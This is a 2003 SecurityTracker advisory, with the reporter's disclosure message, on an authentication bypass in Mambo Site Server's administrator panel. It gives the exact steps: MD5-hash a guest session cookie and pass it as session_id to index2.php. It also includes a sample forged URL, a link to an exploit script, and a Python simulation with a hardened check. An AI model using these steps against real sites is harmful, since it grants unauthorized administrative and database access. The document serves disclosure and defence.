SecurityTracker.com
SecurityTracker Archives
Category:  Application (Generic)  >  Mambo Site Server
Vendors:  Mamboserver.com
Mambo Site Server Authentication Bug Gives Remote Users Administrative Access
SecurityTracker Alert ID:  1006163
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Feb 24 2003
Impact:  User access via network
Exploit Included:  Yes  
Version(s): 4.0.12 RC2
Description:  An authentication vulnerability was reported in Mambo Site Server. A remote user can gain administrative access to the application.

A vulnerability is reported in the '/administrator/index2.php' script: it accepts any session ID that exists in the session table, without checking whether that row belongs to an authenticated administrator. A remote user who knows any such session ID can therefore gain administrator access.

According to the report, a remote user does not even need to log in to obtain one. The SessionCookie.php script (invoked on logout) inserts a guest session into the session table whenever a request arrives without a session cookie, storing the MD5 hash of a random value in the table and setting the raw value as a cookie on the user's browser:

sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063

The remote user can take this cookie value and hash it with MD5 to reproduce the session ID stored in the table. The remote user can then reportedly request the /administrator/index2.php script with the hashed value as the 'session_id' parameter to gain administrative access:

/administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98

With this level of access, the remote user can reportedly gain full access to the contents of the MySQL databases used by Mambo Site Server, including user passwords.

The vendor has reportedly been notified.
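The following is an added example, not code from Mambo or from the report's author: a small Python model of the session handling described above, so the two defects can be seen interacting. The session table is a list of dicts standing in for the real MySQL table, request and response cookies are kept in separate dicts (as they are in a real HTTP exchange, which is exactly what the login path gets wrong), and the column names, the role names in ADMIN_TYPES and the shape of the random value are assumptions modelled on the quoted snippets rather than taken from Mambo's source.

```python
import hashlib
import secrets
import string
import time
from typing import Optional

# Assumed administrative role names; Mambo's real usertype strings may differ.
ADMIN_TYPES = {"superadministrator", "administrator"}


def md5_hex(value: str) -> str:
    """Mambo stores md5($randnum) in the table and sends $randnum raw in the cookie."""
    return hashlib.md5(value.encode()).hexdigest()


def get_session_id1(now: Optional[int] = None) -> str:
    """Stand-in for Mambo's getSessionID1(): random characters followed by a
    unix timestamp, matching the shape of the cookie quoted in the advisory."""
    alphabet = string.ascii_letters + string.digits
    rand = "".join(secrets.choice(alphabet) for _ in range(20))
    return rand + str(int(time.time() if now is None else now))


def logout(request_cookies: dict, table: list, randnum: Optional[str] = None) -> dict:
    """SessionCookie.php path (reached on logout): if the request carried no
    sessioncookie, insert a *guest* row keyed by md5(randnum) and send randnum
    back to the browser.  Returns the response cookies."""
    response_cookies = {}
    if request_cookies.get("sessioncookie", "") == "":
        randnum = randnum or get_session_id1()
        table.append({"session_id": md5_hex(randnum), "guest": 1,
                      "userid": None, "usertype": "", "username": ""})
        response_cookies["sessioncookie"] = randnum      # setcookie(...)
    return response_cookies


def login(request_cookies: dict, table: list, uid: int, usertype: str,
          username: str) -> dict:
    """Login path as quoted: setcookie() is queued for the response, but the
    INSERT is guarded by the *request's* cookie, which the browser has not
    sent yet.  On a first login the row is therefore never written."""
    session_id = get_session_id1()
    response_cookies = {"sessioncookie": session_id}      # setcookie(...)
    if request_cookies.get("sessioncookie", "") != "":   # false on the login request
        table.append({"session_id": md5_hex(session_id), "guest": 0,
                      "userid": uid, "usertype": usertype, "username": username})
    return response_cookies


def is_admin_vulnerable(session_id: str, table: list) -> bool:
    """index2.php as the advisory describes it: any session_id that exists in
    the table is treated as a logged-in administrator."""
    return any(row["session_id"] == session_id for row in table)


def is_admin_fixed(session_id: str, table: list) -> bool:
    """The check a hardened index2.php needs: the row must belong to an
    authenticated (non-guest) user whose type is administrative."""
    for row in table:
        if row["session_id"] == session_id:
            return (row["guest"] == 0 and row["userid"] is not None
                    and row["usertype"] in ADMIN_TYPES)
    return False


def reproduce(cookie_value: str = "nh54OQIZb8ybaA2CNNdU1046102063") -> dict:
    """Walk the exploit end to end.  The cookie value defaults to the one
    quoted in the advisory; any value works, since the server hashes whatever
    it minted and the attacker simply repeats that hash."""
    table: list = []
    # 1. a legitimate admin logs in; because of the cookie bug no row appears
    login({}, table, uid=62, usertype="superadministrator", username="admin")
    rows_after_login = len(table)
    # 2. the attacker, with no cookie at all, requests the logout script
    given = logout({}, table, randnum=cookie_value)
    # 3. the attacker mimics the server: md5 of the raw cookie value
    forged = md5_hex(given["sessioncookie"])
    return {
        "rows_after_login": rows_after_login,
        "forged_session_id": forged,
        "vulnerable_grants_admin": is_admin_vulnerable(forged, table),
        "fixed_grants_admin": is_admin_fixed(forged, table),
    }


if __name__ == "__main__":
    for key, value in reproduce().items():
        print(f"{key}: {value}")
```

The point of the model is that the two bugs compound: the login path leaves the table empty of legitimate rows, so the only session the attacker can learn is a guest row, and the admin check accepts it anyway. The hardened check keys on the row's `guest` and `usertype` columns, which is the minimum a fix needs regardless of how the cookie race is resolved.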

Impact:  A remote user can login to the system as an administrator without supplying valid authentication credentials.
Solution:  No solution was available at the time of this entry. The vendor is reportedly working on a patch.

The author of the report recommends that, as a workaround, users protect the '/administrator' directory with a web server '.htaccess' file.

Vendor URL:  www.mamboserver.com/
Cause:  Authentication error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Simen Bergo <sbergo@thesource.no>
Message History:   None.


 Source Message Contents

Date:  24 Feb 2003 17:08:16 -0000
From:  Simen Bergo <sbergo@thesource.no>
Subject:  Mambo SiteServer exploit gains administrative privileges

 



MAMBO SITESERVER EXPLOIT GAINS ADMINISTRATIVE PRIVILEGES
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
PROGRAM: Mambo SiteServer
HOMEPAGE: http://www.mamboserver.com/
TESTED: Mambo 4.0.12 RC2
LOGIN REQUIRED: No


PROOF OF CONCEPT
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
I have created an exploit that will gain access to the host you specify.
It can be found at the URL below, but must only be used on your own website
for testing purposes.

http://www.voidnull.com/exploit/mamboexp.phps


DESCRIPTION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
"Mambo SiteServer is the finest open source Web Content Management System
available today." (direct quote from the Mambo SiteServer website)

A vulnerability in /administrator/index2.php allows any user to gain
administrator access as long as they know any sessionid in the session
table the script uses. (The code that is vulnerable is too big to include
here)

Actually, you would think that just logging in as a normal user would create
this sessionid; however, a bug in the PHP source code of the project makes
sure this does not happen.

Anyone with a slight knowledge of PHP knows that when you set a cookie,
it is not updated until you refresh the webpage. Anyone but the coders
of Mambo SiteServer, that is:

setcookie("sessioncookie", "$sessionID");       // queues a Set-Cookie header for the response...
if ($HTTP_COOKIE_VARS["sessioncookie"]!="") {    // ...but this reads the cookie the *request* carried, still empty on a first login
  $query="INSERT into ".$dbprefix."session set 
session_id='$cryptSessionID', guest='', userid='$uid', 
usertype='$usertype', gid='$gid', username='$username'";
  $database->openConnectionNoReturn($query);     // so the user's session row is never inserted here
 

As we can see, Mambo SiteServer checks if the cookie has been set before
it inserts the sessionid into the table. As it has not yet been set, no
sessionid is inserted and therefore we cannot "login" to the
administrator directory either.

Moving on in the source code, to SessionCookie.php (which is called when
you logout), we can see that a sessionid is inserted whenever you logout.
Why? I have no idea.

$current_time = time();
if ($HTTP_COOKIE_VARS["sessioncookie"]==""){     // request arrived with no session cookie at all
  $randnum=getSessionID1();                      // raw value, sent to the browser below
  ...
  $cryptrandnum=md5($randnum);                   // hashed value, stored in the session table
  ...
  setcookie("sessioncookie", "$randnum");
  $guest=1;
  $query="INSERT into ".$dbprefix."session SET username='', 
time=$current_time, session_id='$cryptrandnum', guest=$guest";   // a guest row, which index2.php accepts like any other
  $database->openConnectionNoReturn($query);
 

A cookie, looking something like the following will now be sent to the
browser:

sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063

All we have to do is MD5-encrypt it, since that is what was done to the
session that was inserted to the MySQL-table. In this example the encrypted
version is:

0ebda5bbba49dc226b4ed8fc801f1d98

By accessing /administrator/index2.php with this session, Mambo SiteServer
will think that we are the administrator logged in:

/administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98


SUMMARY
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
Gaining administrative privileges gives you access to all MySQL databases,
user passwords, news, polls and everything else the server has. Many
websites run Mambo SiteServer in addition to other scripts that require
MySQL, and this is therefore a huge threat to many webmasters.


SOLUTIONS
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
Until Mambo releases a patch for this vulnerability I suggest
password-protecting your /administrator directory with .htaccess.


VENDOR STATUS 
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
 
The vendor has reportedly been notified. They are currently developing
a patch for this vulnerability.

 


Copyright 2002, SecurityGlobal.net LLC